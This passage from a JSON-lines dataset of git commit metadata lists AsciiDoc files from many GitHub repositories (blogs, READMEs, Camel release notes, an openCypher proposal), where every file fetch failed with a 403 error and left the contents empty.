2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e22695080e26305ef3b7b5b11f9dfb4072c4ec64","subject":"Update 2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","message":"Update 2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_file":"_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"870fa395719ff7c653450b8f9797874b307a0c8e","subject":"CIP20150217 Dynamic Property Lookup","message":"CIP20150217 Dynamic Property Lookup\n\nIt has been requested by users to be able to lookup the key of an entity\nor a map using a dynamically computed String value as the key.\nCurrently Cypher does not provide this. This CIP suggests the\nintroduction of new syntax (`n[\"key\"]``) to enable this. Additionally,\nthis CIP proposes to add a new function (`keys()`) for iterating\nthe keys of any map or entity.\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2015-02-17-dynamic-property-lookup.adoc","new_file":"cip\/CIP2015-02-17-dynamic-property-lookup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a681f0a44d07ef5feb27745012b320c3335a509","subject":"y2b create post The Best Mouse in the World?","message":"y2b create post The Best Mouse in the World?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-29-The-Best-Mouse-in-the-World.adoc","new_file":"_posts\/2015-04-29-The-Best-Mouse-in-the-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"502bba18737b6d93627a315579f56884d69912bd","subject":"y2b create post This Gadget Reads Your Mind","message":"y2b create post This Gadget Reads Your Mind","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-19-This-Gadget-Reads-Your-Mind.adoc","new_file":"_posts\/2016-07-19-This-Gadget-Reads-Your-Mind.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ca7effc511b75f578242287475fbb6de0ccc7f3","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"214860c193a4ae655ed82e7e965959f7a74386f8","subject":"Update 2015-11-10-Visual-Question-Answering-2.adoc","message":"Update 2015-11-10-Visual-Question-Answering-2.adoc","repos":"gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io","old_file":"_posts\/2015-11-10-Visual-Question-Answering-2.adoc","new_file":"_posts\/2015-11-10-Visual-Question-Answering-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gajumaru4444\/gajumaru4444.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee1dc02eea8a159ae020e9fc3ae8e1b05ab6bb5e","subject":"Create do-code-of-conduct-fil.adoc","message":"Create do-code-of-conduct-fil.adoc\n\nFilipino translation for do-code-of-conduct.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-code-of-conduct-fil.adoc","new_file":"src\/do\/do-code-of-conduct-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de2e966981a5bc0b51233f079122f5dafc7f14a7","subject":"Update 2017-03-03-Test-Collab.adoc","message":"Update 2017-03-03-Test-Collab.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2017-03-03-Test-Collab.adoc","new_file":"_posts\/2017-03-03-Test-Collab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"221300cf811968a0eaeba4b044bafe3f11bcf39b","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2ca0d1708c8cf2655449fbee78c95878649f513","subject":"Update 10022015-Blog-Title.adoc","message":"Update 10022015-Blog-Title.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/10022015-Blog-Title.adoc","new_file":"_posts\/10022015-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46529101f72f7828d45a10c285155f9ff671c5ec","subject":"Update 2017-02-25-Life-Lessons-From-Video-Games.adoc","message":"Update 2017-02-25-Life-Lessons-From-Video-Games.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2017-02-25-Life-Lessons-From-Video-Games.adoc","new_file":"_posts\/2017-02-25-Life-Lessons-From-Video-Games.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e56974e909f33d1d96552493a48e9b1c4606bb55","subject":"Create README.adoc","message":"Create README.adoc","repos":"OpenHFT\/Chronicle-Core","old_file":"src\/main\/java\/net\/openhft\/chronicle\/core\/jlbh\/README.adoc","new_file":"src\/main\/java\/net\/openhft\/chronicle\/core\/jlbh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aee0cbff331917043adc53df706d6de494c6925d","subject":"Improvements to domain objects","message":"Improvements to domain objects\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7e351214636dbe168f419be5925fc67a482b6a66","subject":"add doc","message":"add doc\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"78d1e56b40c7d5c8cb5b9e8d74a1959249eab0ed","subject":"Little fixes to the README","message":"Little fixes to the README\n","repos":"pjanouch\/sensei-raw-ctl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sensei-raw-ctl.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"b351585bad555a2b5bb5d4369c268dba4a434618","subject":"Some minor fixes in docs (#54)","message":"Some minor fixes in docs (#54)\n\n","repos":"wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1aa043324cf848443dee961be50e67391f1fdff2","subject":"Update README","message":"Update README\n","repos":"pjanouch\/hex","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/hex.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"298e17eaa3886a24ad2587a5e2838a7a5cbd1844","subject":"symlinked README","message":"symlinked README\n","repos":"Yubico\/yubico-c,Yubico\/yubico-c","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-c.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"14236965065e4d59ccb15164879f643da62d9cd1","subject":"Added readme","message":"Added readme\n","repos":"vert-x3\/vertx-amqp-service,vert-x3\/vertx-amqp-service,InfoSec812\/vertx-amqp-service,vert-x3\/vertx-amqp-service,InfoSec812\/vertx-amqp-service,InfoSec812\/vertx-amqp-service","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InfoSec812\/vertx-amqp-service.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9640f6966247648f103063aa48449e8aa7f3247f","subject":"symlinked README","message":"symlinked README\n","repos":"Yubico\/php-yubico,Yubico\/php-yubico","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/php-yubico.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"39f01bb79b9cb9d391b3219633c81e7ef1682a48","subject":"Create README.adoc","message":"Create README.adoc","repos":"robertpanzer\/asciidoctor-test-webapp","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robertpanzer\/asciidoctor-test-webapp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c72a33da52b08c266d508e220f3b13dc976eef53","subject":"document just the aws stuff","message":"document just the aws stuff\n","repos":"markllama\/aws-cli-thor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/aws-cli-thor.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dce9c18e00519dc6469bb3f02394318b4e8861c1","subject":"Added Camel 2.20.0 release notes to docs","message":"Added Camel 2.20.0 release notes to docs\n","repos":"christophd\/camel,tadayosi\/camel,christophd\/camel,nikhilvibhav\/camel,gnodet\/camel,DariusX\/camel,kevinearls\/camel,jamesnetherton\/camel,DariusX\/camel,punkhorn\/camel-upstream,objectiser\/camel,cunningt\/camel,CodeSmell\/camel,pmoerenhout\/camel,alvinkwekel\/camel,pax95\/camel,pmoerenhout\/camel,mcollovati\/camel,tdiesler\/camel,christophd\/camel,davidkarlsen\/camel,DariusX\/camel,onders86\/camel,jamesnetherton\/camel,adessaigne\/camel,adessaigne\/camel,kevinearls\/camel,punkhorn\/camel-upstream,cunningt\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,nicolaferraro\/camel,apache\/camel,nikhilvibhav\/camel,tadayosi\/camel,Fabryprog\/camel,Fabryprog\/camel,alvinkwekel\/camel,mcollovati\/camel,jamesnetherton\/camel,sverkera\/camel,ullgren\/camel,gnodet\/camel,pax95\/camel,alvinkwekel\/camel,onders86\/camel,kevinearls\/camel,pax95\/camel,nikhilvibhav\/camel,ullgren\/camel,pax95\/camel,apache\/camel,apache\/camel,tdiesler\/camel,jamesnetherton\/camel,mcollovati\/camel,sverkera\/camel,Fabryprog\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,gnodet\/camel,mcollovati\/camel,jamesnetherton\/camel,adessaigne\/camel,CodeSmell\/camel,kevinearls\/camel,zregvart\/camel,christophd\/camel,onders86\/camel,objectiser\/camel,gnodet\/camel,kevinearls\/camel,cunningt\/camel,CodeSmell\/camel,apache\/camel,nicolaferraro\/camel,jamesnetherton\/camel,tdiesler\/camel,Fabryprog\/camel,pmoerenhout\/camel,nicolaferraro\/camel,zregvart\/camel,christophd\/camel,pax95\/camel,sverkera\/camel,sverkera\/camel,cunningt\/camel,zregvart\/camel,onders86\/camel,christophd\/camel,onders86\/camel,sverkera\/camel,ullgren\/camel,adessaigne\/camel,tdiesler\/camel,gnodet\/camel,pmoerenhout\/camel,ullgren\/camel,anoordover\/camel,zregvart\/camel,CodeSmell\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,pmoerenhout\/camel,davidkarlsen\/camel,cunningt\/camel,nicolaferraro\/camel,anoordover\/camel,anoordover\/camel,tdiesler\/camel,apache\/camel,kevinearls\/camel,anoordover\/camel,DariusX\/camel,tadayosi\/camel,davidkarlsen\/camel,apache\/camel,tadayosi\/camel,alvinkwekel\/camel,anoordover\/camel,sverkera\/camel,objectiser\/camel,anoordover\/camel,adessaigne\/camel,tadayosi\/camel,tdiesler\/camel,onders86\/camel,objectiser\/camel,adessaigne\/camel,davidkarlsen\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2200-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2200-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f2e52f90941948b078cec522624fadb5b8f5c6d","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c1ba17796f79b475f8ef7d99a8ee752f25179b2","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b91396a01a0a6db95c907c50cc901ff1e4a64d94","subject":"Update 2015-10-20-Hash-in-Java.adoc","message":"Update 2015-10-20-Hash-in-Java.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b90818528f1964e42a9a1a27fad8b84516e2994","subject":"Update 2016-11-22-Sweet-Potato.adoc","message":"Update 2016-11-22-Sweet-Potato.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de5537a6f6430ea797ef440d79940643169c1341","subject":"Update 2016-12-1-re-Invent2016.adoc","message":"Update 2016-12-1-re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-1-re-Invent2016.adoc","new_file":"_posts\/2016-12-1-re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e56e8c4a63f994ad748f271aef620be084d0cee2","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/07\/16\/deref.adoc","new_file":"content\/news\/2021\/07\/16\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"bc2d310c85c3a09c38b5c5f19da9292e2cdd0e41","subject":"Add note regarding dummy creation to docs in regards to #82","message":"Add note regarding dummy creation to docs in regards to #82\n","repos":"siordache\/spock,raphw\/spock,raphw\/spock,siordache\/spock,siordache\/spock,spockframework\/spock,raphw\/spock,leonard84\/spock","old_file":"docs\/interaction_based_testing.adoc","new_file":"docs\/interaction_based_testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leonard84\/spock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3df68eaf8c8074db231fc11a33c096c2994c2163","subject":"Create \t2014-07-03-forge-2.7.0.final.asciidoc","message":"Create \t2014-07-03-forge-2.7.0.final.asciidoc","repos":"agoncal\/docs,addonis1990\/docs,forge\/docs,agoncal\/docs,luiz158\/docs,luiz158\/docs,forge\/docs,addonis1990\/docs","old_file":"news\/ \t2014-07-03-forge-2.7.0.final.asciidoc","new_file":"news\/ \t2014-07-03-forge-2.7.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f763129874d1f421955f0d9e75944d4e6225eab4","subject":"Publish 2015-2-10-2014.adoc","message":"Publish 2015-2-10-2014.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"2015-2-10-2014.adoc","new_file":"2015-2-10-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1edfce64804041db28c5121ae9fa740ca452353","subject":"add atom setup instructions","message":"add atom setup instructions\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"Atom_first_steps.adoc","new_file":"Atom_first_steps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"fc1c3a07ac1a74448947d23672745b80a75862ff","subject":"y2b create post G-Shock Smartwatch Unboxing! (GB-X6900B) [4K]","message":"y2b create post G-Shock Smartwatch Unboxing! (GB-X6900B) [4K]","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-17-GShock-Smartwatch-Unboxing-GBX6900B-4K.adoc","new_file":"_posts\/2014-02-17-GShock-Smartwatch-Unboxing-GBX6900B-4K.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76c5b3854417bd802b92f7e09abc2450ddd64b82","subject":"Update 2016-10-10-Deepstreamio-Server-on-AWS-in-progress.adoc","message":"Update 2016-10-10-Deepstreamio-Server-on-AWS-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-10-Deepstreamio-Server-on-AWS-in-progress.adoc","new_file":"_posts\/2016-10-10-Deepstreamio-Server-on-AWS-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81b37e64018a48d297ee24789e60f279df840fdb","subject":"iterm: Add an `installation` section to the readme","message":"iterm: Add an `installation` section to the readme\n\nThere are two intricacies one has to keep in mind when installing the\niTerm2 configuration by hand: telling iTerm2 to load the configuration\nfrom a custom path and where the custom path actually is.\n\nLuckily this can be done using `defaults write` and thus is explained\nrather easily.\n","repos":"PigeonF\/.dotfiles","old_file":"iterm2\/README.adoc","new_file":"iterm2\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9b1a75d655d72ae31da5a5af6e3642b4cf42bbb","subject":"Update 2016-03-11-windowslinux.adoc","message":"Update 2016-03-11-windowslinux.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-03-11-windowslinux.adoc","new_file":"_posts\/2016-03-11-windowslinux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1dc764017ef577af0f1499a771799e44740f24b","subject":"Update 2017-05-01-Dquad-Obsession-V2-Review.adoc","message":"Update 2017-05-01-Dquad-Obsession-V2-Review.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2017-05-01-Dquad-Obsession-V2-Review.adoc","new_file":"_posts\/2017-05-01-Dquad-Obsession-V2-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c688b722d00a351e9ab4965ab15170ca97702732","subject":"y2b create post Samsung Galaxy Nexus Unboxing","message":"y2b create post Samsung Galaxy Nexus Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-06-Samsung-Galaxy-Nexus-Unboxing.adoc","new_file":"_posts\/2011-12-06-Samsung-Galaxy-Nexus-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"857264633d10afd9484f803589267ba21f410d79","subject":"Removed online instance usage","message":"Removed online instance usage","repos":"tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/14\/intro-to-hawkular.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/14\/intro-to-hawkular.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f647e0a94582e9ad46571cb07f9a522acd914bd3","subject":"Update 2016-06-24-mintia-and-frisk-and-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-and-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-and-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-and-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"163829908dfc1888c423f126554507b52675c65f","subject":"Changed instructions for copying the rabbitmq config file","message":"Changed instructions for copying the rabbitmq config file\n","repos":"UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources","old_file":"Development-Guide\/Third-Party Libraries\/RabbitMQ\/RabbitMQ.adoc","new_file":"Development-Guide\/Third-Party Libraries\/RabbitMQ\/RabbitMQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Recruit-Resources.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"86087d39157d93f3e8b6c44bf9cb1485e6954135","subject":"y2b create post How To Spot A Fake iPhone","message":"y2b create post How To Spot A Fake 